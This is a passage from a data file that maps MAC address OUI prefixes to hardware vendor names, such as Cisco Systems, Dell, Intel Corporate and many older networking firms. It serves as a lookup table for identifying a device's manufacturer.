Telecommunication +000A24 Octave Communications +000A18 Vichel +000A0C Scientific Research +000A11 ExPet Technologies +0009F8 Unimo Technology +0009FB Philips Patient Monitoring +000A02 Annso +0009EB HuMANDATA +0009EC Daktronics +0009F1 Yamaki Electric +0009E5 Hottinger Baldwin Messtechnik GmbH +0009D9 Neoscale Systems +0009DE Samjin Information & Communications +0009CC Moog GmbH +0009C6 Visionics +0009CB HBrain +0009D2 Mai Logic +0009BE Mamiya-OP +0009C2 Onity +000B51 Micetek International +000B54 BiTMICRO Networks +000B45 Cisco Systems +000B4C Clarion (M) Sdn Bhd +000B40 Oclaro +000B32 Vormetric +000B39 Keisoku Giken +000B3E BittWare +000B26 Wetek +000B2B Hostnet +000B2D Danfoss +000ABB Taiwan Secom +000AC7 Unication Group +000AAF Pipal Systems +000AB6 Compunetix +000AA3 Shimafuji Electric +000AA8 ePipe +000AAA AltiGen Communications +000A90 Bayside Interactive +000A9C Server Technology +000A96 Mewtel Technology +000A81 Teima Audiotex S.L. +000A83 Salto Systems S.L. +000A88 InCypher +000A7C Tecton +000A70 Mpls Forum +000A75 Caterpillar +000A62 Crinis Networks +000A64 Eracom Technologies +000A69 Sunny Bell Technology +000A5D FingerTec Worldwide Sdn Bhd +000AF4 Cisco Systems +000AE8 Cathay Roxus Information Technology +000ADA Vindicator Technologies +000ADC RuggedCom +000AE1 EG Technology +000AC9 Zambeel +000ACE Radiantech +000AD5 Brainchild Electronic +000A4F Brain Boxes Limited +000A51 GyroSignal Technology +000A56 Hitachi Maxell +000A4A Targa Systems +000A37 Procera Networks +000A3E Eads Telecom +000A43 Chunghwa Telecom +000A30 Visteon +000A32 Xsido +000A2B Etherstuff +000A29 Pan Dacom Networking AG +000B1A Industrial Defender +000B1F I CON Computer +000B13 Zetron +000B0C Agile Systems +000B07 Voxpath Networks +000AF9 HiConnect +000AFB Ambri Limited +000B00 Fujian Start Computer Equipment +0009B8 Entise Systems +0009B7 Cisco Systems +0009B2 L&F +0009A5 Hansung Eletronic Industries Development +0009A6 Ignis Optics +0009AB Netcontrol Oy +00099F Videx +0007B3 Cisco Systems +0007AD Pentacon GmbH Foto-und Feinwerktechnik +0007A5 Y.D.K +00079F Action Digital +000792 Stron Electronic GmbH +000799 Tipping Point Technologies +00078C Elektronikspecialisten i Borlange AB +000786 Wireless Networks +000775 Valence Semiconductor +00077C Westermo Teleindustri AB +000776 Federal APD +00077F J Communications +000780 Bluegiga Technologies OY +000881 Digital Hands +02C08C 3com +00087B RTX Telecom A/S +000880 BroadTel Canada Communications +00086E Hyglo AB +000868 PurOptix +000861 SoftEnergy +00084F Qualstar +00085B Hanbit Electronics +000855 Nasa-goddard Space Flight Center +00084E DivergeNet +00085C Shanghai Dare Technologies +0007ED Altera +0007F4 Eletex +0007E1 WIS Communications +0007D4 Zhejiang Yutong Network Communication +0007DB Kirana Networks +0007D5 3e Technologies Int;. +0005F9 TOA +0007C5 Gcom +0007CC Kaba Benzing GmbH +0007C6 VDS Vosskuhler GmbH +0007B9 Ginganet +0007BF Armillaire Technologies +00047F Chr. Mayr GmbH & KG +000961 Switchgear and Instrumentation +00095A Racewood Technology +000954 AMiT spol. s. r. o. +00094E Bartech Systems International +000953 Linkage System IntegrationLtd. +000942 Wireless Technologies +000947 Aztek +00093B Hyundai Networks +000934 Dream-Multimedia-Tv GmbH +0008BA Erskine Systems +0008B4 Syspol +0008AE PacketFront Network Products AB +0008A7 iLogic +0008A2 ADI Engineering +0008A1 CNet Technology +00089B ICP Electronics +00088D Sigma-Links +000893 LE Information Communication +00088E Nihon Computer +000897 Quake Technologies +000887 Maschinenfabrik Reinhausen GmbH +0008FD BlueKorea +0008F5 Yestechnology +0008EF Dibal +0008EA Motion Control Engineering +0008DD Telena Communications +0008DE 3UP Systems +0008E3 Cisco Systems +0008D7 HOW +0008CB Zeta Broadband +0008D0 Musashi Engineering +0008C1 Avistar Communications +0008C6 Philips Consumer Communications +000993 Visteon +000998 Capinfo Company Limited +000986 Metalink +000985 Auto Telecom Company +00098C Option Wireless Sweden +000980 Power Zenith +000973 Lenten Technology +000974 Innopia Technologies +000979 Advanced Television Systems Committee +00096D Powernet Technologies +00081F Pou Yuen Tech +000826 Colorado Med Tech +000820 Cisco Systems +000825 Acme Packet +00082C Homag AG +000819 Banksys +000810 Key Technology +000813 Diskbank +00080A Espera-Werke GmbH +000804 ICA +0007FA ITT +0007E7 FreeWave Technologies +0007EE telco Informationssysteme GmbH +000928 Telecore +00092F Akom Technology +000922 TST Biometrics GmbH +000921 Planmeca Oy +00091C CacheVision +000910 Simple Access +000915 CAS +00090F Fortinet +000909 Telenor Connect A/S +000902 Redline Communications +00065E Photuris +000645 Meisei Electric +000644 neix +00064B Alexon +00063B Arcturus Networks +00063A Dura Micro +000634 GTE Airfone +00062A Cisco Systems +000627 Uniwide Technologies +00062E Aristos Logic +000617 Redswitch +00061E Maxan Systems +000618 DigiPower Manufacturing +000770 Ubiquoss +00076B Stralfors AB +00075F VCS Video Communication Systems AG +000766 Chou Chin Industrial +000759 Boris Manufacturing +00074C Beicom +000753 Beijing Qxcomm Technology +000743 Chelsio Communications +000744 Unico +000747 Mecalc +000737 Soriya +00073E China Great-Wall Computer Shenzhen +0006C4 Piolink +0006C0 United Internetworks +0006BA Westwave Communications +0006AD KB Electronics +0006B4 Vorne Industries +0006AE Himachal Futuristic Communications +0006B3 Diagraph +0006A3 Bitran +00069D Petards +0006A7 Primarion +000657 Market Central +000697 R & D Center +000691 PT Inovacao +0005C7 I/f-com A/S +0005CE Prolink Microsystems +0005C1 A-Kyung Motion +0005BB Myspace AB +00059B Cisco Systems +0005B5 Broadcom Technologies +00059A Cisco Systems +0005A1 Zenocom +0005AB Cyber Fone +000588 Sensoria +00058E Flextronics International GmbH & Nfg. KG +000612 Accusys +000609 Crossport Systems +00060F Narad Networks +000602 Cirkitech Electronics +0005ED Technikum Joanneum GmbH +000600 Toshiba Teli +0005E7 Netrake an AudioCodes Company +0005F3 Webyn +0005FA IPOptical +0005DE Gi Fone Korea +0005DA Apex Automationstechnik +0005C8 Verytech +0005D4 FutureSmart Networks +0006EC Harris +0006DF Aidonic +0006E0 MAT +0006E5 Fujian Newland Computer +0006DB Ichips +0006D0 Elgar Electronics +0006D7 Cisco Systems +0006CA American Computer & Digital Components, (acdc) +000581 Snell +00057B Chung Nam Electronic +000582 ClearCube Technology +000577 SM Information & Communication +000571 Seiwa Electronics +00056B C.P. Technology +000565 Tailyn Communication Company +00055F Cisco Systems +00055E Cisco Systems +000558 Synchronous +000552 Xycotec Computer GmbH +000549 Salira Optical Network Systems +00072B Jung Myung Telecom +000731 Ophir-Spiricon +00071A Finedigital +000721 Formac Elektronik GmbH +00070E Cisco Systems +000715 General Research of Electronics +000708 Bitrage +0006F2 Platys Communications +0006FE Ambrado +0006FC Fnet +000684 Biacore AB +00068A NeuronNet R&D Center +00067E WinCom Systems +000670 Upponetti Oy +000676 Novra Technologies +00067A JMP Systems +000664 Fostex +00066A InfiniCon Systems +000651 Aspen Networks +00065D Heidelberg Web Systems +000415 Rasteme Systems +000408 Sanko Electronics +000409 Cratos Networks +000402 Nexsan Technologies +0003F8 SanCastle Technologies +0003FF Microsoft +0003F1 Cicada Semiconductor +0003F2 Seneca Networks +0003EC ICG Research +0003E6 Entone +0003DE OTC Wireless +0003E1 Winmate Communication +0003DA Takamisawa Cybernetics +00054C RF Innovations +000543 IQ Wireless GmbH +00053D Agere Systems +000530 Andiamo Systems +000537 Nets Technology +000536 Danam Communications +000524 BTL System (HK) Limited +00052A Ikegami Tsushinki +00051D Airocon +000517 Shellcomm +000513 VTLinx Multimedia Systems +0004D4 Proview Electronics +0004CE Patria Ailon +0004CD Extenway Solutions +0004C7 NetMount +0004C8 Liba Maschinenfabrik Gmbh +0004C1 Cisco Systems +0004BB Bardac +0004B5 Equitrac +0004A7 FabiaTech +0004A1 Pathway Connectivity +00049A Cisco Systems +00035B BridgeWave Communications +000356 Wincor Nixdorf International GmbH +000350 Bticino SPA +000348 Norscan Instruments +000345 Routrek Networks +00033D Ilshin Lab +0001EC Ericsson Group +000331 Cisco Systems +000338 Oak Technology +000335 Mirae Technology +00032C ABB Switzerland +000325 Arima Computer +000453 YottaYotta +00044D Cisco Systems +000449 Mapletree Networks +000443 Agilent Technologies +00043D Indel AG +000431 GlobalStreams +000436 Elansat Technologies +000430 Netgem +00042A Wireless Networks +000424 TMC s.r.l. +00041B Bridgeworks +00041E Shikoku Instrumentation +0003D3 Internet Energy Systems +0003CE Eten Technologies +0003CB Nippon Systems Development +0003C2 Solphone K.K. +0003C7 hopf Elektronik GmbH +0003BB Signal Communications Limited +0003B5 Entra Technology +0003B0 Xsense Technology +0003A4 Imation +0003A9 Axcent Media AG +0003AD Emerson Energy Systems AB +000396 EZ Cast +00050D Midstream Technologies +000507 Fine Appliance +0004FD Japan Control Engineering +0004F7 Omega Band +0004F1 WhereNet +0004DA Relax Technology +008087 OKI Electric Industry +0004E0 Procket Networks +000460 Knilink Technology +000494 Breezecom +00048E Ohm Tech Labs +000495 Tejas Networks India Limited +000483 Deltron Technology +000489 Yafo Networks +000479 Radius +00046D Cisco Systems +000472 Telelynx +00046C Cyber Technology +000466 Armitel +00045A The Linksys Group +00045F Avalue Technology +000391 Advanced Digital Broadcast +00038A America Online +00038E Atoga Systems +00037C Coax Media +000381 Ingenico International +000375 NetMedia +00036E Nicon Systems (Pty) Limited +000362 Vodtel Communications +00031C Svenska Hardvarufabriken AB +000315 Cidco Incorporated +000310 E-Globaledge +00030D Uniwill Computer +000309 Texcel Technology PLC +000304 Pacific Broadband Communications +00019F ReadyNet +0002FD Cisco Systems +0002F6 Equipe Communications +0002F1 Pinetron +0002EF CCC Network Systems Group +0002EB Pico Communications +0002E6 Gould Instrument Systems +0002DF Net Com Systems +0002D3 NetBotz +0002D8 Brecis Communications +0002CC M.c.c.i +0002D0 Comdial +0002C5 Evertz Microsystems +0002C0 Bencent Tzeng Industry +0002BD Bionet +0002B7 Watanabe Electric Industry +0002B0 Hokubu Communication & Industrial +0002A8 Air Link Technology +0002AB CTC Union Technologies +0002A4 AddPac Technology +000299 Apex +00029D Merix +000291 Open Network +00028A Ambit Microsystems +000287 Adapcom +00028C Micrel-Synergy Semiconductor +000282 ViaClix +00027B Amplify Net +00024F IPM Datacom S.R.L. +000274 Tommy Technologies +00026F Senao International +000264 AudioRamp.com +00306C Hitex Holding GmbH +000177 Edsl +000161 Meta Machine Technology +000168 Vitana +000174 CyberOptics +000164 Cisco Systems +000170 ESE Embedded System Engineer'g +000152 Chromatek +000156 Firewiredirect.com +00013F Neighbor World +000146 Tesco Controls +000133 Kyowa Electronic Instruments C +0001E3 Siemens AG +0001EA Cirilium +0001EF Camtel Technology +0001F2 Mark of the Unicorn +0001D7 F5 Networks +0001DC Activetelco +0001DF Isdn Communications +0001D3 Paxcomm +0001C5 Simpler Networks +0001D0 VitalPoint +0001B2 Digital Processing Systems +0001C1 Vitesse Semiconductor +0001BA IC-Net +0001B6 Saejin T&M +00022B SAXA +000226 XESystems +00021E Simtel S.r.l. +00021A Zuma Networks +00020B Native Networks +000212 SierraCom +000217 Cisco Systems +000207 VisionGlobal Network +000204 Bodmann Industries Elektronik GmbH +0001F8 Texio Technology +0001FF Data Direct Networks +0001FB DoTop Technology +000268 Harris Government Communications +00025D Calix Networks +000258 Flying Packets Communications +000257 Microcom +000254 WorldGate +000248 Pilz GmbH & +00022E Teac R& D +000241 Amer.com +000232 Avision +00012A Telematica Sistems Inteligente +000137 IT Farm +000143 Cisco Systems +00011B Unizone Technologies +000122 Trend Communications +00011E Precidia Technologies +000108 Avlab Technology +00010B Space CyberLink +0001AE Trex Enterprises +0001AA Airspan Communications +000198 Darim Vision +000180 AOpen +000187 I2SE GmbH +00018F Kenetec +000183 Anite Telecoms +00019C JDS Uniphase +000190 Smk-m +0030D1 Inova +003032 MagicRam +00305A Telgen +003069 Impacct Technology +0030EC Borgardt +0030B4 Intersil +00308E Cross Match Technologies +0030D0 Tellabs +0030A5 Active Power +003009 Tachion Networks +00302F GE Aviation System +0030A4 Woodwind Communications System +0030E5 Amper Datos +0030C0 Lara Technology +00300E Klotz Digital AG +003094 Cisco Systems +00309A Astro Terra +00300C Congruency +0030FD Integrated Systems Design +003023 Cogent Computer Systems +0030DF Kb/tel Telecomunicaciones +00307D GRE America +00D0E4 Cisco Systems +00D08B Adva Optical Networking +00D098 Photon Dynamics Canada +00D05E Stratabeam Technology +00D0BE Emutec +00D0F4 Carinthian Tech Institute +00D0AA Chase Communications +00D0FA Thales e-Security +00D006 Cisco Systems +00D03D Galileo Technology +00D014 ROOT +00D0DD Sunrise Telecom +00D091 Smartsan Systems +00B0EE Ajile Systems +00B0E7 British Federal +00B04A Cisco Systems +00B069 Honewell Oy +00B0C2 Cisco Systems +00B0DF Starboard Storage Systems +00B0EC Eacem +003092 ModuNORM GmbH +0030EE DSG Technology +003042 DeTeWe-Deutsche Telephonwerke +003099 Boenig UND Kallenbach OHG +003051 Orbit Avionic & Communication +0030AB Delta Networks +003093 Sonnet Technologies +00303C Onnto +0030C7 Macromate +003066 RFM +00307F Irlan +003016 Ishida +00302A Southern Information +0030DC Rightech +00D0A4 Alantro Communications +00D043 Zonal Retail Data Systems +00D016 SCM Microsystems +00D012 Gateworks +00D092 Glenayre Western Multiplex +00D0C5 Computational Systems +0001A7 Unex Technology +00D0B5 IPricot formerly DotCom +0030E8 Ensim +0030ED Expert Magnetics +0030F9 Sollae Systems +003098 Global Converging Technologies +0030E2 Garnet Systems +003002 Expand Networks +00300B mPHASE Technologies +00308F Micrilor +0030F3 At Work Computers +00D0F9 Acute Communications +00D063 Cisco Systems +00D069 Technologic Systems +00D070 Long Well Electronics +00D061 Tremon Enterprises +00D0C4 Teratech +0030BF Multidata Gmbh +00D0D7 B2C2 +00D015 Univex Microtechnology +00D0A5 American Arium +00D0E5 Solidum Systems +00D0B3 DRS Technologies Canada +00D0E9 Advantage Century Telecommunication +00D094 Seeion Control +009045 Marconi Communications +0090F6 Escalate Networks +0090EA Alpha Technologies +0090FE Elecom, (laneed DIV.) +0090EB Sentry Telecom Systems +00908E Nortel Networks Broadband Access +0090CA Accord Video Telecommunications +00908B Tattile SRL +009099 Allied Telesis +00900E Handlink Technologies +0090F7 Nbase Communications +009024 Pipelinks +009052 Selcom Elettronica S.r.l. +0090E5 Teknema +009085 Golden Enterprises +009019 Hermes Electronics +0090DC Teco Information Systems +00D0AE Oresis Communications +00D0D4 V-bits +00D041 Amigo Technology +00D0D1 Sycamore Networks +00D0A1 Oskar Vierling Gmbh + KG +00D00B RHK Technology +00D02C Campbell Scientific +00D0A0 Mips Denmark +00D04E Logibag +00D0D9 Dedicated Microcomputers +00D0CD Atan Technology +00D01D Furuno Electric +00D0C7 Pathway +00D05C Kathrein Technotrend Gmbh +00D040 Sysmate +00D08A Photron USA +00D076 Bank of America +00D07A Amaquest Computer +00D0BB Cisco Systems +00D001 VST Technologies +00904C Epigram +009000 Diamond Multimedia +009025 BAE Systems Australia (Electronic Systems) +0090F8 Mediatrix Telecom +009084 Atech System +009054 Innovative Semiconductors +009080 NOT Limited +0090C0 K.J. LAW Engineers +0090BC Telemann +00900A Proton Electronic Industrial +00904E Delem BV +00904A Concur System Technologies +009029 Crypto AG +009061 Pacific Research & Engineering +0090A9 Western Digital +009072 Simrad AS +005048 Infolibria +0050EA XEL Communications +0050CE LG International +005019 Spring Tide Networks +0050AC Maple Computer +005044 Asaca +0050C6 Loop Telecommunication International +005049 Arbor Networks +00509F Horizon Computer +0050C8 Addonics Technologies +0050DC TAS Telefonbau A. Schwabe Gmbh & KG +005069 PixStream Incorporated +00901D PEC (nz) +00902D Data Electronics (aust.) +009007 Domex Technology +009048 Zeal +0090E6 ALi +009046 Dexdyne +00905E Rauland-borg +009067 WalkAbout Computers +0090DA Dynarc +009026 Advanced Switching Communications +0090BB Tainet Communication System +009033 Innovaphone AG +009010 Simulation Laboratories +00903D Biopac Systems +009057 AANetcom +00901C mps Software Gmbh +009056 Telestream +00907D Lake Communications +0090DB Next Level Communications +005042 SCI Manufacturing Singapore PTE +0050C0 Gatan +0050D3 Digital Audio Processing +00509A TAG Electronic Systems +00507D IFP +0050D0 Minerva Systems +005098 Globaloop +0050FA Oxtel +005086 Telkom SA +0050E1 NS Tech Electronics SDN BHD +005013 Chaparral Network Storage +005022 Zonet Technology +005040 Panasonic Electric Works +0050D6 Atlas Copco Tools AB +005082 Foresson +0050CA NET TO NET Technologies +0050A6 Optronics +0050DB Contemporary Control +00506B Spx-ateg +005074 Advanced Hi-tech +005047 Private +005067 Aerocomm +005024 Navic Systems +005041 Coretronic +0050D2 CMC Electronics +0090DE Cardkey Systems +009060 System Create +0090F1 DOT Hill Systems +0090E2 Distributed Processing Technology +00906B Applied Resources +009020 Philips Analytical X-ray +009065 Finisar +001053 Computer Technology +0010A3 Omnitronix +00102B Umax Data Systems +001055 Fujitsu Microelectronics +00103C IC Ensemble +0010D9 IBM Japan, Fujisawa Mt+d +0010A5 Oxford Instruments +001046 Alcorn Mcbride +00E0DC Nexware +00E0D9 Tazmo +00E0C2 Necsy +00E09B Engage Networks +00E045 Touchwave +00E055 Ingenieria Electronica Comercial Inelcom +00E037 Century +00E081 Tyan Computer +00E0D4 Excellent Computer +00E01A Comtec Systems. +00E0BC Symon Communications +00E084 Compulite R&D +00E0F6 Decision Europe +00E027 DUX +00E07F Logististem S.r.l. +00E043 VitalCom +00E0BF Torrent Networking Technologies +00E09D Sarnoff +00E0BB NBX +00E08A GEC Avery +00E04B Jump Industrielle Computertechnik Gmbh +001015 OOmon +001088 American Networks +001008 Vienna Systems +0010CC CLP Computer Logistik Planung Gmbh +001094 Performance Analysis Broadband, Spirent plc +0010BB Data & Information Technology +001028 Computer Technica +00108A TeraLogic +0010C5 Protocol Technologies +00106D Axxcelera Broadband Wireless +0010FC Broadband Networks +001078 Nuera Communications +001048 Htrc Automation +001081 DPS +00102D Hitachi Software Engineering +00109F PAVO +0010A1 Kendin Semiconductor +001084 K-bot Communications +0010AF TAC Systems +00100F Industrial CPU Systems +0010A2 TNS +001000 Cable Television Laboratories +00103B Hippi Networking Forum +0060C2 MPL AG +0060A2 Nihon Unisys Limited +006046 Vmetro +00609D PMI Food Equipment Group +0060BF Macraigor Systems +00604A Saic Ideas Group +006081 Tv/com International +0060B4 Glenayre R&D +006045 Pathlight Technologies +00A005 Daniel Instruments +00A053 Compact Devices +00A033 imc MeBsysteme GmbH +00A059 Hamilton Hallmark +00A0AD Marconi SPA +00A0F6 AutoGas Systems +00A006 Image Data Processing System Group +0060F3 Performance Analysis Broadband, Spirent plc +00600B Logware Gmbh +00603F Patapsco Designs +00607C WaveAccess +00608D Unipulse +006049 Vina Technologies +0060A1 VPNet +0060C9 ControlNet +00605F Nippon Unisoft +006021 DSC +00601D Lucent Technologies +000800 Multitech Systems +0060C7 Amati Communications +00E0CA Best Data Products +00E097 Carrier Access +00E09F Pixel Vision +00E0F5 Teles AG +00E070 DH Technology +00E0B5 Ardent Communications +00E073 National Amusement Network +00E0E8 Gretacoder Data Systems AG +00E016 Rapid City Communications +00E001 Strand Lighting Limited +00E082 Anerma +00E0EA Innovat Communications +00E06A Kapsch AG +00E023 Telrad +00E0C3 Sakai System Development +00601A Keithley Instruments +0060AF Pacific Micro DATA +00601F Stallion Technologies +00608F Tekram Technology +0060C5 Ancot +006023 Pericom Semiconductor +006063 Psion Dacom PLC. +00604F Tattile SRL +0060E8 Hitachi Computer Products (america) +006072 VXL Instruments, Limited +006054 Controlware Gmbh +00A0DC O.N. Electronic +00A013 Teltrend +00A0DF STS Technologies +00A061 Puritan Bennett +00A0CE Ecessa +00A02A Trancell Systems +00A02C interWAVE Communications +00A077 Fujitsu Nexion +00A020 Citicorp/tti +00A00D THE Panda Project +00A031 Hazeltine, MS 1-17 +00A041 Inficon +0060FA Educational Technology Resources +000288 Global Village Communication +0060F9 Diamond Lane Communications +0060EA StreamLogic +0060EC Hermary Opto Electronics +00604E Cycle Computer +00602C Linx Data Terminals +006028 Macrovision +00606A Mitsubishi Wireless Communications. +00E021 Freegate +00E0AB Dimat +00E0B6 Entrada Networks +00E0EC Celestica +00E038 Proxima +00E090 Beckman LAB. Automation DIV. +00E02E SPC Electronics +00E0F4 Inside Technology A/S +00E03C AdvanSys +00E096 Shimadzu +00E0F1 That +00A0D0 TEN X Technology +00A0E0 Tennyson Technologies +00A099 K-net +00A03D Opto-22 +00A08C MultiMedia LANs +1000E8 National Semiconductor +006076 Schlumberger Technologies Retail Petroleum Systems +0060AE Trio Information Systems AB +00606C Arescom +006032 I-cube +006060 Data Innovations North America +00A0EB Encore Networks +00A0C1 Ortivus Medical AB +00A07D Seeq Technology +00A0CF Sotas +00A03A Kubotek +00A0D7 Kasten Chase Applied Research +00A09D Johnathon Freeman Technologies +00A036 Applied Network Technology +00A0D2 Allied Telesis International +00A075 Micron Technology +00A009 Whitetree Network +00A060 Acer Peripherals +00A00C Kingmax Technology +0020FD ITV Technologies +00200D Carl Zeiss +002091 J125, National Security Agency +002054 Sycamore Networks +0020A7 Pairgain Technologies +002005 Simple Technology +00202B Advanced Telecommunications Modules +002086 Microtech Electronics Limited +002052 Ragula Systems +002090 Advanced Compression Technology +0020A3 Harmonic +00206A Osaka Computer +0020DB Xnet Technology +0020A4 Multipoint Networks +00201C Excel +00209B Ersat Electronic Gmbh +0020C9 Victron BV +0020D1 Microcomputer Systems (M) SDN. +002084 OCE Printing Systems +0020C2 Texas Memory Systems +0020C8 Larscom Incorporated +0020EC Techware Systems +002083 Presticom Incorporated +00206D Data RACE +00203A Digital Bi0metrics +00A06C Shindengen Electric MFG. +00A0EE Nashoba Networks +00A0FB Toray Engineering +00A0E3 XKL Systems +00A01E EST +00A080 Tattile SRL +00A0C2 R.A. Systems +00A0CB ARK Telecommunications +00A074 Perception Technology +00A06A Verilink +00A070 Coastcom +00A079 Alps Electric (usa) +002059 Miro Computer Products AG +0020BC Long Reach Networks +0020AD Linq Systems +002046 Ciprico +002071 IBR Gmbh +0020A2 Galcom Networking +002098 Hectronic AB +002065 Supernet Networking +002094 Cubix +0020C3 Counter Solutions +0020A5 API Engineering +002070 Hynet +00201E Netquest +002097 Applied Signal Technology +0020E8 Datatrek +00204F Deutsche Aerospace AG +00202E Daystar Digital +0020B0 Gateway Devices +0020A9 White Horse Industrial +002061 GarrettCom +0020C6 Nectec +0020D2 RAD Data Communications +00A0F8 Zebra Technologies +00A025 Redcom Labs +00A0D4 Radiolan +00A08A Brooktrout Technology +002093 Landings Technology +002056 Neoproducts +0020A6 Proxim Wireless +00C073 Xedia +00C0D4 Axon Networks +00C0E5 Gespac +00A0CA Fujitsu Denso +00A029 Coulter +00C088 EKF Elektronik Gmbh +00C056 Somelec +00C063 Morning Star Technologies +00C021 Netexpress +00C049 U.S. Robotics +00C032 I-cubed Limited +00C051 Advanced Integration Research +00C085 Electronics FOR Imaging +00C0FE Aptec Computer Systems +00C0E8 Plexcom +00C0B2 Norand +00C0B1 Genius NET +00C0D9 Quinte Network Confidentiality +00C038 Raster Image Processing System +00C098 Chuntex Electronic +00C0DD QLogic +00C08A Lauterbach GmbH +0040FF Telebit +0040D7 Studio GEN +004007 Telmat Informatique +00408D THE Goodyear Tire & Rubber +00402C Isis Distributed Systems +00C03D Wiesemann & Theis Gmbh +00C026 Lans Technology +0040E2 Mesa Ridge Technologies +004078 Wearnes Automation PTE +004062 E-systems,/garland DIV. +0040D2 Pagine +0040D0 Mitac International +0040E4 E-M Technology +0040BF Channel Systems Intern'l +004094 Shographics +00407F Flir Systems +0040A9 Datacom +00C07D Risc Developments +00C01E LA Francaise DES Jeux +00C084 Data Link +00C087 Uunet Technologies +00C033 Telebit Communications APS +00C081 Metrodata +00C006 Nippon Avionics +00C013 Netrix +00C058 Dataexpert +0040E8 Charles River Data Systems +004030 GK Computer +0080DC Picker International +00C0A8 GVC +00C010 Hirakawa Hewtech +00C020 Arco Electronic, Control +0040A6 Cray +004098 Dressler Gmbh & +00C0B9 Funk Software +00C065 Scope Communications +00C018 Lanart +00C0FF DOT Hill Systems +00400D Lannet Data Communications +0040F5 OEM Engines +004019 Aeon Systems +0040A1 Ergo Computing +00407E Evergreen Systems +0040F6 Katron Computers +004076 Sun Conversion Technologies +0040F4 Cameo Communications +00C06D Boca Research +00C0DB IPC (pte) +00C0DA Nice Systems +00C09B Reliance Comm/tec +00C0B8 Fraser's Hill +00C016 Electronic Theatre Controls +00C096 Tamura +00C035 Quintar Company +00C0CC Telesciences Systems +00C078 Computer Systems Engineering +0040F3 Netcor +004033 Addtron Technology +0040A3 Microunity Systems Engineering +0040ED Network Controls Int'natl +0040AD SMA Regelsysteme Gmbh +0080D2 Shinnihondenko +0080DF ADC Codenoll Technology +008071 SAI Technology +00803D Surigiken +00804B Eagle Technologiesltd. +008007 Dlog Nc-systeme +008001 Periphonics +008062 Interface +0080F3 SUN Electronics +00808D Westcoast Technology +0080B2 Network Equipment Technologies +00805B Condor Systems +00801C Newport Systems Solutions +0080C6 National Datacomm +0080FA RWT Gmbh +008084 THE Cloud +008046 Tattile SRL +0080A6 Republic Technology +008009 Jupiter Systems +0080B5 United Networks +008035 Technology Works +008088 Victor Company OF Japan +00809E Datus Gmbh +008055 Fermilab +00802A Test Systems & Simulations +0040E3 Quin Systems +004091 Procomp Industria Eletronica +004014 Comsoft Gmbh +00400F Datacom Technologies +004085 Saab Instruments AB +004006 Sampo Technology +00402D Harris Adacom +004047 Wind River Systems +0040FA Microboards +00002E Societe Evira +0000ED April +00003C Auspex Systems +000051 HOB Electronic Gmbh & KG +0000A7 Network Computing Devices +0000F7 Youth Keep Enterprise +0000FC Meiko +0000B5 Datability Software SYS. +000026 Sha-ken +000022 Visual Technology +00006D Cray Communications +0000FA Microsage Computer Systems +00002B Crisp Automation +000019 Applied Dynamics International +0080D3 Shiva +0080A5 Speed International +0080A9 Clearpoint Research +008069 Computone Systems +008091 Tokyo Electric +0080F4 Telemecanique Electrique +00800C Videcom Limited +0080E8 Cumulus Corporatiion +0000CD Allied Telesis Labs +0000A5 Tattile SRL +00801E Xinetron +00804A Pro-log +008059 Stanley Electric +00806B Schmid Telecommunication +00802C THE Sage Group PLC +008018 Kobe Steel +0080EE Thomson CSF +008013 Thomas-conrad +00808E Radstone Technology +000036 Atari +0080BD THE Furukawa Electric +0080A8 Vitacom +008042 Artesyn Embedded Technologies +008067 Square D Company +008045 Matsushita Electric IND. +00804C Contec +008020 Network Products +004044 Qnix Computer +0040DD Hong Technologies +00403A Impact Technologies +0040C9 Ncube +004075 Tattile SRL +0080F1 Opus Systems +08008F Chipcom +080081 Astech +08007A Indata +080078 Accell +08006E Masscomp +08006D Whitechapel Computer Works +08006C Suntek Technology Int'l +080067 ComDesign +080063 Plessey +080060 Industrial Networking +000081 Bay Networks +0000A1 Marquette Electric +0000F5 Diamond Sales Limited +0000E5 Sigmex +0000BA SIIG +00002F Timeplex +0000B8 Seikosha +00007F Linotype-hell AG +0000B7 Dove Computer +00009A RC Computer A/S +0000DE Cetia +00004B ICL Data OY +000013 Camex +000095 Sony Tektronix +080037 Fuji-xerox +080031 Little Machines +08002B Digital Equipment +08002A Mosaic Technologies +080029 Megatek +080026 Norsk Data A.S. +08001F Sharp +0000AE Dassault Electronique +0000DD TCL Incorporated +0000D9 Nippon Telegraph & Telephone +000046 Olivetti North America +000017 Oracle +00009F Ameristar Technologies +0000E3 Integrated Micro Products +000073 Siecor +0000D3 Wang Laboratories +0000B3 Cimlinc Incorporated +00009D Locus Computing +000060 Kontron Elektronik Gmbh +000011 Normerel Systemes +08006F Philips Apeldoorn +0000B0 Rnd-rad Network Devices +000071 Adra Systems +00006C Private +AA0000 Digital Equipment +0270B0 M/a-com Companies +00000B Matrix +080042 Japan Macnics +026086 Logic Replacement TECH. +00DD05 Ungermann-bass +00BBF0 Ungermann-bass +0080E9 Madge +080055 Stanford Telecomm. +080048 Eurotherm Gauging Systems +080049 Univation +00DD02 Ungermann-bass +000003 Xerox +000008 Xerox +080030 Cern +00DD01 Ungermann-bass +18017D Harbin Arteor technology +001CDF Belkin International +944452 Belkin International +08863B Belkin International +001556 Sagemcom Broadband SAS +002569 Sagemcom Broadband SAS +001BBF Sagemcom Broadband SAS +4C17EB Sagemcom Broadband SAS +7C034C Sagemcom Broadband SAS +88AE1D Compal Information (kunshan) +5C353B Compal Broadband Networks +1C4419 TP-Link Technologies +749DDC 2Wire +782BCB Dell +B8CA3A Dell +F01FAF Dell +C81F66 Dell +00183F 2Wire +0019E4 2Wire +001AC4 2Wire +001D5A 2Wire +34EF44 2Wire +982CBE 2Wire +001422 Dell +001C23 Dell +00219B Dell +000874 Dell +002564 Dell +842B2B Dell +E0DB55 Dell +A41F72 Dell +00C04F Dell +F04DA2 Dell +BC305B Dell +001D09 Dell +F8E079 Motorola Mobility, a Lenovo Company +1430C6 Motorola Mobility, a Lenovo Company +000D67 Ericsson +E0757D Motorola Mobility, a Lenovo Company +001E65 Intel Corporate +001F3B Intel Corporate +0016EA Intel Corporate +00216B Intel Corporate +0019D1 Intel Corporate +001CC0 Intel Corporate +5CE0C5 Intel Corporate +183DA2 Intel Corporate +448500 Intel Corporate +809B20 Intel Corporate +100BA9 Intel Corporate +247703 Intel Corporate +C48508 Intel Corporate +0026C6 Intel Corporate +74E50B Intel Corporate +58946B Intel Corporate +002710 Intel Corporate +64D4DA Intel Corporate +DCA971 Intel Corporate +001CBF Intel Corporate +A0A8CD Intel Corporate +340286 Intel Corporate +34DE1A Intel Corporate +80000B Intel Corporate +B80305 Intel Corporate +303A64 Intel Corporate +ACFDCE Intel Corporate +E09467 Intel Corporate 